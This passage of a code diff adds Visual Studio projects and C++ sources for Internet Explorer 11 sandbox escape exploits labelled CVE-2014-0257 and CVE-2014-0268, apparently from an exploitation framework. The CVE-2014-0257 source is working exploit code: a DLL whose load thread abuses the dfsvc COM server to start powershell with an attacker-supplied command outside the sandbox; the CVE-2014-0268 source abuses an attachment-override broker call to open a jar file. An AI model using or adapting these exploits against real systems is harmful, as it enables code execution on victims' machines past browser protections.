<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
|
||||
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
|
||||
</ProjectReference>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
// dllmain.cpp : Defines the entry point for the DLL application.
|
||||
#include "stdafx.h"
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule);
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CVE-2014-0268.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,12 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <windows.h>
|
||||
#include <Utils.h>
|
||||
#include "interfaces.h"
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
201
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
vendored
Executable file
201
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
vendored
Executable file
|
@ -0,0 +1,201 @@
|
|||
// This file is part of IE11SandboxEsacapes.
|
||||
|
||||
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License as published by
|
||||
// the Free Software Foundation, either version 3 of the License, or
|
||||
// (at your option) any later version.
|
||||
|
||||
// IE11SandboxEscapes is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
|
||||
// You should have received a copy of the GNU General Public License
|
||||
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
#define MAX_ENV 32767
|
||||
|
||||
#import <mscorlib.tlb> rename("ReportEvent", "_ReportEvent")
|
||||
|
||||
const wchar_t CLSID_DFSVC[] = L"{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}";
|
||||
|
||||
long GetSafeArrayLen(LPSAFEARRAY psa)
|
||||
{
|
||||
long ubound = 0;
|
||||
|
||||
SafeArrayGetUBound(psa, 1, &ubound);
|
||||
|
||||
return ubound + 1;
|
||||
}
|
||||
|
||||
mscorlib::_MethodInfoPtr GetStaticMethod(mscorlib::_TypePtr type, LPCWSTR findName, int pcount)
|
||||
{
|
||||
LPSAFEARRAY methods = type->GetMethods_2();
|
||||
mscorlib::_MethodInfoPtr ret;
|
||||
LONG methodCount = GetSafeArrayLen(methods);
|
||||
|
||||
for (long i = 0; i < methodCount; ++i)
|
||||
{
|
||||
IUnknown* v = nullptr;
|
||||
|
||||
if (SUCCEEDED(SafeArrayGetElement(methods, &i, &v)))
|
||||
{
|
||||
mscorlib::_MethodInfoPtr method = v;
|
||||
|
||||
bstr_t name = method->Getname();
|
||||
LPSAFEARRAY params = method->GetParameters();
|
||||
long paramCount = GetSafeArrayLen(params);
|
||||
|
||||
if (method->IsStatic && wcscmp(name.GetBSTR(), findName) == 0 && paramCount == pcount)
|
||||
{
|
||||
ret = method;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
SafeArrayDestroy(methods);
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vector<variant_t>& args)
|
||||
{
|
||||
variant_t obj;
|
||||
T retObj;
|
||||
|
||||
SAFEARRAY * psa;
|
||||
SAFEARRAYBOUND rgsabound[1];
|
||||
|
||||
rgsabound[0].lLbound = 0;
|
||||
rgsabound[0].cElements = (ULONG)args.size();
|
||||
psa = SafeArrayCreate(VT_VARIANT, 1, rgsabound);
|
||||
|
||||
for (LONG indicies = 0; indicies < (LONG)args.size(); ++indicies)
|
||||
{
|
||||
SafeArrayPutElement(psa, &indicies, &args[indicies]);
|
||||
}
|
||||
|
||||
variant_t ret = method->Invoke_3(obj, psa);
|
||||
|
||||
if ((ret.vt == VT_UNKNOWN) || (ret.vt == VT_DISPATCH))
|
||||
{
|
||||
retObj = ret.punkVal;
|
||||
}
|
||||
|
||||
SafeArrayDestroy(psa);
|
||||
|
||||
return retObj;
|
||||
}
|
||||
|
||||
bstr_t GetEnv(LPWSTR env)
|
||||
{
|
||||
WCHAR buf[MAX_ENV];
|
||||
|
||||
GetEnvironmentVariable(env, buf, MAX_ENV);
|
||||
|
||||
return buf;
|
||||
}
|
||||
|
||||
void DoDfsvcExploit()
|
||||
{
|
||||
CLSID clsid;
|
||||
|
||||
CLSIDFromString(CLSID_DFSVC, &clsid);
|
||||
|
||||
DebugPrintf("Starting DFSVC Exploit\n");
|
||||
|
||||
mscorlib::_ObjectPtr obj;
|
||||
|
||||
HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
|
||||
|
||||
if (FAILED(hr))
|
||||
{
|
||||
WCHAR cmdline[] = L"dfsvc.exe";
|
||||
|
||||
STARTUPINFO startInfo = { 0 };
|
||||
PROCESS_INFORMATION procInfo = { 0 };
|
||||
|
||||
// Start dfsvc (because we can due to the ElevationPolicy)
|
||||
if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
|
||||
nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo))
|
||||
{
|
||||
CloseHandle(procInfo.hProcess);
|
||||
CloseHandle(procInfo.hThread);
|
||||
|
||||
// Just sleep to ensure it comes up
|
||||
Sleep(4000);
|
||||
hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
|
||||
}
|
||||
else
|
||||
{
|
||||
DebugPrintf("Couldn't create service %d\n", GetLastError());
|
||||
}
|
||||
}
|
||||
|
||||
if (SUCCEEDED(hr))
|
||||
{
|
||||
try
|
||||
{
|
||||
mscorlib::_TypePtr type = obj->GetType();
|
||||
|
||||
// Get type of Type (note defaults to RuntimeType then TypeInfo)
|
||||
type = type->GetType()->BaseType->BaseType;
|
||||
|
||||
DebugPrintf("TypeName: %ls", type->FullName.GetBSTR());
|
||||
|
||||
mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1);
|
||||
|
||||
DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod);
|
||||
|
||||
std::vector<variant_t> getTypeArgs;
|
||||
|
||||
getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
|
||||
|
||||
// Get process type
|
||||
type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs);
|
||||
|
||||
if (type)
|
||||
{
|
||||
mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2);
|
||||
|
||||
if (startMethod)
|
||||
{
|
||||
std::vector<variant_t> startArgs;
|
||||
|
||||
startArgs.push_back(L"powershell");
|
||||
startArgs.push_back(GetEnv(L"PSHCMD"));
|
||||
|
||||
ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
|
||||
}
|
||||
else
|
||||
{
|
||||
DebugPrintf("Couldn't find Start method");
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
DebugPrintf("Couldn't find Process Type");
|
||||
}
|
||||
}
|
||||
catch (_com_error e)
|
||||
{
|
||||
DebugPrintf("COM Error: %ls\n", e.ErrorMessage());
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr);
|
||||
}
|
||||
}
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule)
|
||||
{
|
||||
CoInitialize(nullptr);
|
||||
DoDfsvcExploit();
|
||||
CoUninitialize();
|
||||
|
||||
FreeLibraryAndExitThread((HMODULE)hModule, 0);
|
||||
}
|
182
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj
vendored
Executable file
182
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj
vendored
Executable file
|
@ -0,0 +1,182 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{2A46841E-E3FC-42FF-BCDF-70F76E757E26}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20140268</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="CVE-2014-0257.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
|
||||
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
|
||||
</ProjectReference>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
// dllmain.cpp : Defines the entry point for the DLL application.
|
||||
#include "stdafx.h"
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule);
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CVE-2014-0268.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,11 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <windows.h>
|
||||
#include <Utils.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
81
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp
vendored
Executable file
81
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp
vendored
Executable file
|
@ -0,0 +1,81 @@
|
|||
// This file is part of IE11SandboxEsacapes.
|
||||
|
||||
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License as published by
|
||||
// the Free Software Foundation, either version 3 of the License, or
|
||||
// (at your option) any later version.
|
||||
|
||||
// IE11SandboxEscapes is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
|
||||
// You should have received a copy of the GNU General Public License
|
||||
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
#include "stdafx.h"
|
||||
#include <Utils.h>
|
||||
#include <Shlwapi.h>
|
||||
#include <Exdisp.h>
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IWebBrowser2, __uuidof(IWebBrowser2));
|
||||
|
||||
void DoSetAttachmentUserOverride()
|
||||
{
|
||||
IShdocvwBroker* shdocvw = nullptr;
|
||||
|
||||
try
|
||||
{
|
||||
HRESULT ret;
|
||||
shdocvw = CreateSHDocVw();
|
||||
|
||||
CLSID clsid;
|
||||
|
||||
CLSIDFromString(L"{0002DF01-0000-0000-C000-000000000046}", &clsid);
|
||||
|
||||
IWebBrowser2Ptr browser;
|
||||
|
||||
ret = CoCreateInstance(clsid, nullptr, CLSCTX_SERVER, IID_PPV_ARGS(&browser));
|
||||
if (FAILED(ret))
|
||||
{
|
||||
DebugPrintf("CoCreateInstance: %08X", ret);
|
||||
throw new _com_error(ret);
|
||||
}
|
||||
|
||||
DebugPrintf("browser: %p", browser);
|
||||
|
||||
unsigned char buf[1] = { 0 };
|
||||
|
||||
ret = shdocvw->SetAttachmentUserOverride(L"jarfile");
|
||||
if (FAILED(ret))
|
||||
{
|
||||
DebugPrintf("Failed to set attachement user override\n");
|
||||
throw new _com_error(ret);
|
||||
}
|
||||
|
||||
bstr_t nav = L"http://www.dummy.local/testapp.jar";
|
||||
|
||||
DebugPrintf("Navigate: %08X", browser->Navigate(nav, nullptr, nullptr, nullptr, nullptr));
|
||||
}
|
||||
catch (_com_error e)
|
||||
{
|
||||
DebugPrintf("Error during processing: %ls\n", e.ErrorMessage());
|
||||
}
|
||||
|
||||
if (shdocvw)
|
||||
{
|
||||
shdocvw->Release();
|
||||
shdocvw = nullptr;
|
||||
}
|
||||
}
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule)
|
||||
{
|
||||
CoInitialize(nullptr);
|
||||
DoSetAttachmentUserOverride();
|
||||
CoUninitialize();
|
||||
|
||||
FreeLibraryAndExitThread((HMODULE)hModule, 0);
|
||||
|
||||
return 0;
|
||||
}
|
183
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj
vendored
Executable file
183
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj
vendored
Executable file
|
@ -0,0 +1,183 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20140268</RootNamespace>
|
||||
<ProjectName>CVE-2014-0268</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
